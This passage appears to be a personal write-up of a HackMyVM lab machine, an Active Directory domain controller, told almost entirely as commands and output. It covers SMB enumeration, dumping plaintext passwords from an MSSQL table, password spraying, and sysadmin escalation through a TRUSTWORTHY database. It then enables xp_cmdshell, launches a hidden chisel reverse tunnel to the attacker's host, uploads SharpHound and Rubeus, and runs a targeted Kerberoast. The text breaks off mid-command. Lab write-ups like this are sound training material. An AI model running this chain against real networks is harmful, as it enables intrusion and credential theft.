SMB         172.16.55.128   445    DC01             IPC$            READ            Remote IPC
SMB         172.16.55.128   445    DC01             NETLOGON        READ            Logon server share 
SMB         172.16.55.128   445    DC01             notes                           
SMB         172.16.55.128   445    DC01             SYSVOL          READ            Logon server share

smb(users)

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc smb 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY' --users
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY 
SMB         172.16.55.128   445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         172.16.55.128   445    DC01             Administrator                 2025-10-17 18:08:02 0       Built-in account for administering the computer/domain
SMB         172.16.55.128   445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         172.16.55.128   445    DC01             krbtgt                        2025-10-17 03:15:35 0       Key Distribution Center Service Account
SMB         172.16.55.128   445    DC01             hank                          2025-10-19 12:05:12 0 
SMB         172.16.55.128   445    DC01             lookback-admin                2025-10-19 12:11:25 0 
SMB         172.16.55.128   445    DC01             db-admin                      2025-10-19 12:15:44 0 
SMB         172.16.55.128   445    DC01             Service_Maintainer            2025-10-19 13:27:26 0 
SMB         172.16.55.128   445    DC01             IT-SEC-admin                  2025-10-19 14:11:48 0 
SMB         172.16.55.128   445    DC01             IT-admin                      2025-10-19 14:15:17 0 
SMB         172.16.55.128   445    DC01             IT-login-user                 2025-10-19 14:17:16 0 
SMB         172.16.55.128   445    DC01             IT-email-admin                2025-10-19 14:20:21 0 
SMB         172.16.55.128   445    DC01             [*] Enumerated 11 local users: LOOKBACK

mssql

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u hank -p 'HrUhoX2r6c7Jgxg2qiTY'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\hank:HrUhoX2r6c7Jgxg2qiTY

Mssql-1433

连接(hank)

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# impacket-mssqlclient 'lookback.htb/hank:HrUhoX2r6c7Jgxg2qiTY@172.16.55.128' -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(dc01): Line 1: Changed database context to 'master'.
[*] INFO(dc01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (lookback\hank  guest@master)>

信息收集

enum-db

SQL (lookback\hank  guest@master)> enum_db
name       is_trustworthy_on   
--------   -----------------   
master                     0   
tempdb                     0   
model                      0   
msdb                       1   
lookback                   1   
notes                      0

enum_logins

SQL (lookback\hank  guest@master)> enum_logins
name            type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
-------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa              SQL_LOGIN                 0          1               0             0            0              0           0           0           0   
lookback\hank   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

权限查询

SQL (lookback\hank  guest@master)> SELECT SYSTEM_USER;
                
-------------   
lookback\hank

SQL (lookback\hank  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
    
-   
0

SQL (lookback\hank  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name   subentity_name   permission_name     
-----------   --------------   -----------------   
server                         CONNECT SQL         
server                         VIEW ANY DATABASE

SQL (lookback\hank  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
entity_name   subentity_name   permission_name                             
-----------   --------------   -----------------------------------------   
database                       CONNECT                                     
database                       VIEW ANY COLUMN ENCRYPTION KEY DEFINITION   
database                       VIEW ANY COLUMN MASTER KEY DEFINITION

Note数据库

尝试密码喷洒都失败了

经与前文smb(users)的比对确定lookback_admin应为lookback-admin

SQL (lookback\hank  LOOKBACK\hank@notes)> SELECT name FROM sys.tables;
name          
-----------   
users_notes   
SQL (lookback\hank  LOOKBACK\hank@notes)> SELECT * FROM notes.dbo.users_notes;
id   username            password                                                                         
--   -----------------   ------------------------------------------------------------------------------   
 1   Update Notice       Due to multiple weak passwords, strong password accounts are now being issued.   
 2   jacob               G4vK1sZq9pH7tR2L                                                                 
 3   www_data            Q8mP2cV7xN3yJ5S0                                                                 
 4   Administrator       Z2pL6wF9rT5bC3K1                                                                 
 5   mssqlsvc            H5kR3nV8qW1tM7X2                                                                 
 6   signed_IT           U7qF2bY9mC4pL1T6                                                                 
 7   wack_admin          N6vT4pR8sK1qZ3H0                                                                 
 8   lan                 P3rM9tW2kV7xL5C1                                                                 
 9   user_roundcube      F8kJ2vN6qR4pT1Z3                                                                 
10   user                Y1pL7nK3vR9tC5M2                                                                 
11   stow_svc            D4qV8mP2rT6kN1S9                                                                 
12   ch_user             L9rT3pF6vK1nM8Q2                                                                 
13   rustkey             C2pN7qR5vT9kL3H1                                                                 
14   outbound_user       S6kP1vR9tM4qN2Z8                                                                 
15   lookback_migrator   B7qR2pT6vN1kM9C4                                                                 
16   lookback_admin      iPmmhn8bguFcWin9

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc smb 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'

SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 
                                                                                                        
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9

users.txt

jacob
www_data
Administrator
mssqlsvc
signed_IT
wack_admin
lan
user_roundcube
user
stow_svc
ch_user
rustkey
outbound_user
lookback_migrator
lookback_admin

passwords.txt

G4vK1sZq9pH7tR2L
Q8mP2cV7xN3yJ5S0
Z2pL6wF9rT5bC3K1
H5kR3nV8qW1tM7X2
U7qF2bY9mC4pL1T6
N6vT4pR8sK1qZ3H0
P3rM9tW2kV7xL5C1
F8kJ2vN6qR4pT1Z3
Y1pL7nK3vR9tC5M2
D4qV8mP2rT6kN1S9
L9rT3pF6vK1nM8Q2
C2pN7qR5vT9kL3H1
S6kP1vR9tM4qN2Z8
B7qR2pT6vN1kM9C4
iPmmhn8bguFcWin9

netexec-密码喷洒

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc smb 172.16.55.128 -d lookback.htb -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [-] lookback.htb\jacob:G4vK1sZq9pH7tR2L STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\www_data:Q8mP2cV7xN3yJ5S0 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\Administrator:Z2pL6wF9rT5bC3K1 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\mssqlsvc:H5kR3nV8qW1tM7X2 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\signed_IT:U7qF2bY9mC4pL1T6 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\wack_admin:N6vT4pR8sK1qZ3H0 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lan:P3rM9tW2kV7xL5C1 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\user_roundcube:F8kJ2vN6qR4pT1Z3 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\user:Y1pL7nK3vR9tC5M2 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\stow_svc:D4qV8mP2rT6kN1S9 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\ch_user:L9rT3pF6vK1nM8Q2 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\rustkey:C2pN7qR5vT9kL3H1 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\outbound_user:S6kP1vR9tM4qN2Z8 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lookback_migrator:B7qR2pT6vN1kM9C4 STATUS_LOGON_FAILURE
SMB         172.16.55.128   445    DC01             [-] lookback.htb\lookback_admin:iPmmhn8bguFcWin9 STATUS_LOGON_FAILURE

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc smb 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'

SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 
                                                                                                        
┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9

连接(lookback-admin)

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# impacket-mssqlclient 'lookback.htb/lookback-admin:iPmmhn8bguFcWin9@172.16.55.128' -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(dc01): Line 1: Changed database context to 'master'.
[*] INFO(dc01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (lookback\lookback-admin  guest@master)>

信息收集

enum-db

SQL (lookback\lookback-admin  guest@master)> enum_db
name       is_trustworthy_on   
--------   -----------------   
master                     0   
tempdb                     0   
model                      0   
msdb                       1   
lookback                   1   
notes                      0

enum_logins

SQL (lookback\lookback-admin  guest@master)> enum_logins
name                      type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
-----------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa                        SQL_LOGIN                 0          1               0             0            0              0           0           0           0   
lookback\lookback-admin   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

权限查询

SQL (lookback\lookback-admin  guest@master)> SELECT SYSTEM_USER;
                          
-----------------------   
lookback\lookback-admin

SQL (lookback\lookback-admin  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
    
-   
0

SQL (lookback\lookback-admin  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name   subentity_name   permission_name     
-----------   --------------   -----------------   
server                         CONNECT SQL         
server                         VIEW ANY DATABASE

SQL (lookback\lookback-admin  guest@master)> SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
entity_name   subentity_name   permission_name                             
-----------   --------------   -----------------------------------------   
database                       CONNECT                                     
database                       VIEW ANY COLUMN ENCRYPTION KEY DEFINITION   
database                       VIEW ANY COLUMN MASTER KEY DEFINITION

权限提升

前置条件

`EXECUTE AS OWNER` 提权

TRUSTWORTHY 属性允许数据库内的模拟（Impersonation）上下文跨越数据库边界。
结合另一个条件：如果数据库的所有者是高权限登录名（比如 sa），那么在该数据库内创建一个 EXECUTE AS OWNER 的存储过程，执行时就会以 **sa** 的权限级别运行

enum_db  --> lookback 数据库 is_trustworthy_on = 1

数据库所有者

SQL (lookback\hank  guest@msdb)> SELECT name, SUSER_SNAME(owner_sid) AS owner FROM sys.databases WHERE name = 'lookback';
name       owner                    
--------   ----------------------   
lookback   LOOKBACK\Administrator

exploit

步骤 1：进入 `lookback` 数据库

SQL (lookback\lookback-admin  guest@master)> USE lookback;
ENVCHANGE(DATABASE): Old Value: master, New Value: lookback
INFO(dc01): Line 1: Changed database context to 'lookback'.

步骤 2：创建提权存储过程

SQL (lookback\lookback-admin  lookback\lookback-admin@lookback)> CREATE OR ALTER PROCEDURE dbo.privesc WITH EXECUTE AS OWNER AS BEGIN ALTER SERVER ROLE [sysadmin] ADD MEMBER [LOOKBACK\lookback-admin]; END;

步骤 3：执行存储过程

SQL (lookback\lookback-admin  lookback\lookback-admin@lookback)> EXEC dbo.privesc;

步骤 4：验证是否成功

SQL (lookback\lookback-admin  dbo@lookback)> SELECT IS_SRVROLEMEMBER('sysadmin');
    
-   
1

若返回 1，则说明已成功加入 sysadmin 角色。

步骤 5：启用 `xp_cmdshell` 并执行命令

SQL (lookback\lookback-admin  dbo@lookback)> EXEC sp_configure 'show advanced options', 1;
INFO(dc01): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (lookback\lookback-admin  dbo@lookback)> RECONFIGURE;
SQL (lookback\lookback-admin  dbo@lookback)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(dc01): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (lookback\lookback-admin  dbo@lookback)> RECONFIGURE;
SQL (lookback\lookback-admin  dbo@lookback)> EXEC xp_cmdshell 'whoami';
output              
-----------------   
lookback\db-admin   
NULL

建立隧道

需要将域内端口转发出来

Kali

尝试了下其它端口发现没有回连

/usr/bin/chisel server --reverse --socks5 -p 445 -v

MSSQL

upload

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file /home/kali/Desktop/tools/chisel/chisel.exe C:\\ProgramData\\chisel.exx
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/chisel/chisel.exe to C:\ProgramData\chisel.exe
MSSQL       172.16.55.128   1433   DC01             [*] Size is 10612224 bytes
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'cmd /c taskkill /F /IM chisel.exe';
output                                       
------------------------------------------   
ERROR: The process "chisel.exe" not found.   
NULL                                         
SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'powershell -NoP -W Hidden -Command "Start-Process -FilePath ''C:\ProgramData\chisel.exe'' -ArgumentList ''client 172.16.55.193:445 R:socks'' -WindowStyle Hidden"';
output   
------   
NULL

Sharphound

upload

┌──(web)─(root㉿kali)-[/home/kali]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/sharphound/SharpHound_v2.9.0/SharpHound.ps1' 'C:\Users\db-admin\Desktop\SharpHound.ps1' 
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/sharphound/SharpHound_v2.9.0/SharpHound.ps1 to C:\Users\db-admin\Desktop\SharpHound.ps1
MSSQL       172.16.55.128   1433   DC01             [*] Size is 1618189 bytes
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

┌──(web)─(root㉿kali)-[/home/kali]
└─# impacket-mssqlclient 'lookback.htb/lookback-admin:iPmmhn8bguFcWin9@172.16.55.128' -windows-auth <<SQL
EXEC xp_cmdshell 'if not exist C:\Users\db-admin\Desktop\bh_out mkdir C:\Users\db-admin\Desktop\bh_out'; 
EXEC xp_cmdshell 'powershell -NoP -Ep Bypass -Command "Import-Module ''C:\Users\db-admin\Desktop\SharpHound.ps1''; Invoke-BloodHound -CollectionMethod All -Domain lookback.htb -OutputDirectory C:\Users\db-admin\Desktop\bh_out -ZipFileName 20260410_lookback.zip"';      
EXEC xp_cmdshell 'dir C:\Users\db-admin\Desktop\bh_out';
SQL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(dc01): Line 1: Changed database context to 'master'.
[*] INFO(dc01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (lookback\lookback-admin  dbo@master)> output   
------   
NULL     
SQL (lookback\lookback-admin  dbo@master)>

download

需要等一小会脚本运行完毕

┌──(web)─(root㉿kali)-[/home/kali]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --get-file 'C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip' '/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)                                                                                                   
MSSQL       172.16.55.128   1433   DC01             [*] Copying "C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip" to "/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip"
MSSQL       172.16.55.128   1433   DC01             [+] File "C:\Users\db-admin\Desktop\bh_out\20260410_lookback.zip" was downloaded to "/home/kali/Desktop/hmv/lookback/loot/20260410_lookback.zip"

Bloodhound

攻击链

清晰得不能再清晰了db-admin -> IT-SEC-admin -> IT-admin -> IT-login-user

ACL 链式攻击

DB-ADMIN -> IT-SEC-ADMIN（定向 Kerberoast）

思路：给 IT-SEC-admin 临时加可烤 SPN，取票后离线爆破。
得到：IT-SEC-admin : <REDACTED_ITSEC_ADMIN_PASSWORD>

PowerView

upload

┌──(web)─(root㉿kali)-[/home/…/Desktop/hmv/lookback/myself]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/PowerSploit/PowerView.ps1' 'C:\Users\db-admin\Desktop\PowerView.ps1'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)                                                                                                   
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\db-admin\Desktop\PowerView.ps1
MSSQL       172.16.55.128   1433   DC01             [*] Size is 770271 bytes
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

添加 SPN

SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'powershell -NoP -Ep Bypass -Command "& { . C:\Users\db-admin\Desktop\PowerView.ps1; Get-DomainUser -Identity IT-SEC-admin | fl samaccountname,serviceprincipalname; Set-DomainObject -Identity IT-SEC-admin -Set @{servicePrincipalName=''http/itsec-admin''}; Get-DomainUser -Identity IT-SEC-admin | fl samaccountname,serviceprincipalname }"'
output                                    
---------------------------------------   
NULL                                      
NULL                                      
samaccountname : IT-SEC-admin             
NULL                                      
NULL                                      
NULL                                      
NULL                                      
NULL                                      
samaccountname       : IT-SEC-admin       
serviceprincipalname : http/itsec-admin   
NULL                                      
NULL                                      
NULL                                      
NULL

Rubeus

upload

┌──(web)─(root㉿kali)-[/home/kali]
└─# nxc mssql 172.16.55.128 -d lookback.htb -u lookback-admin -p 'iPmmhn8bguFcWin9' --put-file '/home/kali/Desktop/tools/Rubeus/2.2.0/Rubeus2.2.exe' 'C:\Users\db-admin\Desktop\Rubeus.exe'
MSSQL       172.16.55.128   1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (EncryptionReq:False)
MSSQL       172.16.55.128   1433   DC01             [+] lookback.htb\lookback-admin:iPmmhn8bguFcWin9 (Pwn3d!)                                                                                                   
MSSQL       172.16.55.128   1433   DC01             [*] Copy /home/kali/Desktop/tools/Rubeus/2.2.0/Rubeus2.2.exe to C:\Users\db-admin\Desktop\Rubeus.exe
MSSQL       172.16.55.128   1433   DC01             [*] Size is 446976 bytes
MSSQL       172.16.55.128   1433   DC01             [+] File has been uploaded on the remote machine

run

SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'C:\Users\db-admin\Desktop\Rubeus.exe kerberoast /user:IT-SEC-admin /simple /nowrap /outfile:C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash';
output                                                                                                                                                                                                       
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
NULL                                                                                                                                                                                                         
   ______        _                                                                                                                                                                                           
  (_____ \      | |                                                                                                                                                                                          
   _____) )_   _| |__  _____ _   _  ___                                                                                                                                                                      
  |  __  /| | | |  _ \| ___ | | | |/___)                                                                                                                                                                     
  | |  \ \| |_| | |_) ) ____| |_| |___ |                                                                                                                                                                     
  |_|   |_|____/|____/|_____)____/(___/                                                                                                                                                                      
NULL                                                                                                                                                                                                         
  v2.2.0                                                                                                                                                                                                     
NULL                                                                                                                                                                                                         
NULL                                                                                                                                                                                                         
[*] Action: Kerberoasting                                                                                                                                                                                    
NULL                                                                                                                                                                                                         
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.                                                                                                                                            
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.                                                                                                                                 
NULL                                                                                                                                                                                                         
[*] Target User            : IT-SEC-admin                                                                                                                                                                    
[*] Target Domain          : lookback.htb                                                                                                                                                                    
[*] Searching path 'LDAP://dc01.lookback.htb/DC=lookback,DC=htb' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=IT-SEC-admin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'   
NULL                                                                                                                                                                                                         
[*] Total kerberoastable users : 1                                                                                                                                                                           
NULL                                                                                                                                                                                                         
[*] Hash written to C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash                                                                                                                                          
NULL                                                                                                                                                                                                         
[*] Roasted hashes written to : C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash                                                                                                                              
NULL

Gethash

SQL (lookback\lookback-admin  dbo@master)> EXEC xp_cmdshell 'type C:\Users\db-admin\Desktop\bh_out\itsec_tgs.hash';
output                                                                                                                                                                                                                                                            
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15B2938BBB018EC0B10522526A1E3CA6$AEF2D06442E183BD6D32B3705B7556EA18ABDD06DDEEB448E9A49E4E1AE21CA823BFC1E57A26B02FCE1B6C107CBEFBE96BF5E6175DFF88A55B1C9075A0ACAF058589FF0B07805FF68849D657   
96DC9FB7B3A9CCEE249068950BF5F838685AA2449D5E8E4A88A75C0A7521177108ADA00B65A6F6AACA6E59972D4F9F3582A5C606D5DDA154E232E0563971C97F37071995147BDE8BBBF29D295FB8549F13961C7A781AD02C8D20D9996954336F82D5DA0C4E42097191D8D71A6617C7ED4933B2E0FF7F3006B97FD2E3399577A   
61B11A2398026511604DB6B818C494ABEFC5C734B79D8BBBE7EC917137D3060A423E3714533EFABD76401977CB66D19C2DD435B4218B4DE2DF76925C4EDD2D94E6FF886ABCCCAC5234ECFF7D51D622DCDA5CA2EDECE98AA7D8DA59FD7F8296E5B619A9BF9D4183CFC5708280FB8CCF21B8A9F4B0D552BB6A3C78A0859060A35   
C34E17C21AD37DD10D2898D78EDEF8E8D48423B79BD915012E77F8A74EC2C61D75CD44BB7F903B47343730F34BEAEE6CAC2758BE44A13B026A48571BBA8C0AB4A7087466C8F611C08608D2294EEBC57C9B0C5661470AEEA820E1616D551F96BAA6D32E9A5631B5C9C5FCE8C0A38C47D2C072DFB0F6A3A418F0675B7F66F6221   
EC2A53C92179FAB9D3E49B096AEC18461E0CBB92730034E4C835B192D3BD3855C4683EAE38F990A2C5C1834F158BDE4AF684D6E66D8C9EC1ACD9CFDB4130053D3DEC7473554B7568F94663104C67161E1B1A7BBC5221D5A44D8F63E612477EB8D610DD53773BAC09DE0F47F46588AE2BE7C052A6070FF74743DE1B3B9CAB7FF   
6550771D358E6586E6E5F098A7E2ED38CF17DD13AF77224BE4D195E0D084043386854C64837AC941D837BD884692ACC2F55E2723957944913C88628193AE567D34BA79A8142329B39FF0E8786217293D9C40385D17104698C866FE7F69EC076E99E60612704FFC5B9B076B09D46C92F3DA9F8A37C1CB3E6EB9CC6B1FC9E7D4B   
7C3BD56996FED0E8424E78A8D749EE56D44EFD0BB893B9203D107F5FD8427BF71218D713BD4F4FC11102131CD79A3A1CC94150B7F36C6F224F360C8A81DC072FB094B43B6237C84D78549A85E91DFB39DFB4CB9938EC62BECBC16D5A8885E8857703AF25054737DB87738E6A78A384A4F18640D52F3250489FD0F6EBFCD39DC   
BA85ED1CA86FB97254C05EBDA575F790F6502A2C07CC52BDC49B1C5118513D06B453460BEA7606A32F1BD602C714451E837DC6B829A8FD586072634B84158FA136B0B0E75CBD040BB686D56BECEEA9F25C19FB2B5DAB9F514D91805CCE95A191E6B6601D7FC91FB6D56D386B53890E0A1FE2C592ED4D0A755B19196F944C551   
F3B08D08635F5256B7B442D18D21D26EB7E0314104750F51CCBBF5BA235879D3BD6A5990C540E91FD65011892804709D7F8FF7071F40E6D9E11A9649499CAE1EA753FFA28FC87038BBEE09DF813EAA24D7BEFD258FF383620C8A693A6666F1091E01FBCB534C74782D5AAECAEC5A6090B4921527ECAA99FFEB316F0956B33A1   
0D489CB09385391B1430CAB31A63952C5CFA7B86920F6B                                                                                                                                                                                                                    
NULL

Hashcat

得到凭据itsec-admin/butterfly

echo '$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15B2938BBB018EC0B10522526A1E3CA6$AEF2D06442E183BD6D32B3705B7556EA18ABDD06DDEEB448E9A49E4E1AE21CA823BFC1E57A26B02FCE1B6C107CBEFBE96BF5E6175DFF88A55B1C9075A0ACAF058589FF0B07805FF68849D65796DC9FB7B3A9CCEE249068950BF5F838685AA2449D5E8E4A88A75C0A7521177108ADA00B65A6F6AACA6E59972D4F9F3582A5C606D5DDA154E232E0563971C97F37071995147BDE8BBBF29D295FB8549F13961C7A781AD02C8D20D9996954336F82D5DA0C4E42097191D8D71A6617C7ED4933B2E0FF7F3006B97FD2E3399577A61B11A2398026511604DB6B818C494ABEFC5C734B79D8BBBE7EC917137D3060A423E3714533EFABD76401977CB66D19C2DD435B4218B4DE2DF76925C4EDD2D94E6FF886ABCCCAC5234ECFF7D51D622DCDA5CA2EDECE98AA7D8DA59FD7F8296E5B619A9BF9D4183CFC5708280FB8CCF21B8A9F4B0D552BB6A3C78A0859060A35C34E17C21AD37DD10D2898D78EDEF8E8D48423B79BD915012E77F8A74EC2C61D75CD44BB7F903B47343730F34BEAEE6CAC2758BE44A13B026A48571BBA8C0AB4A7087466C8F611C08608D2294EEBC57C9B0C5661470AEEA820E1616D551F96BAA6D32E9A5631B5C9C5FCE8C0A38C47D2C072DFB0F6A3A418F0675B7F66F6221EC2A53C92179FAB9D3E49B096AEC18461E0CBB92730034E4C835B192D3BD3855C4683EAE38F990A2C5C1834F158BDE4AF684D6E66D8C9EC1ACD9CFDB4130053D3DEC7473554B7568F94663104C67161E1B1A7BBC5221D5A44D8F63E612477EB8D610DD53773BAC09DE0F47F46588AE2BE7C052A6070FF74743DE1B3B9CAB7FF6550771D358E6586E6E5F098A7E2ED38CF17DD13AF77224BE4D195E0D084043386854C64837AC941D837BD884692ACC2F55E2723957944913C88628193AE567D34BA79A8142329B39F